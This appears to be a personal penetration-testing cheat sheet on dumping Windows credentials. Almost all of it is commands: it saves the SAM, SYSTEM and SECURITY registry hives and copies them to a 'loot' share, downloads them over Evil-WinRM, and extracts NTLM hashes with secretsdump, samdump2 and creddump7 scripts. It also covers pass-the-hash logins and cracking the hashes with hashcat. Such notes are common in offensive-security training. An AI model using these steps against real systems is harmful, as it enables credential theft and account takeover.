x

Living off the Land

23.1.1 - SAM, SYSTEM and Security files

BUILTIN\Admins 

whoami /all 

reg save hklm\security c:\security
reg save hklm\sam c:\sam
reg save hklm\system c:\system

copy C:\sam z:\loot
copy c:\security z:\loot
c:\system z:\loot

Could always utilise SMBServer.py here too 

*Evil-WinRM* PS C:\windows.old\Windows\system32> download SAM
*Evil-WinRM* PS C:\windows.old\Windows\system32> download SYSTEM

Can pull NTLM hashes of all users with this, you can then log in using PtH on Evil-WinRM or xfreerdp3. All listed tools come from creddump7, worth trying each if one fails. 

impacket-secretsdump -sam sam -security security -system system LOCAL

samdump2 SYSTEM SAM     

python2 samdump.py SYSTEM SAM

python2 lsasecrets.py SYSTEM SECURITY

python2 cachedump.py SYSTEM SECURITY

secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL

Alternatively to logging in, try cracking the hashes. Some machines do not allow for the use of hashes to login, mitigating PtH. 

hashcat -m 2100 hashes.txt /usr/share/wordlists/rockyou.txt
Left-click: follow link, Right-click: select node, Scroll: zoom
x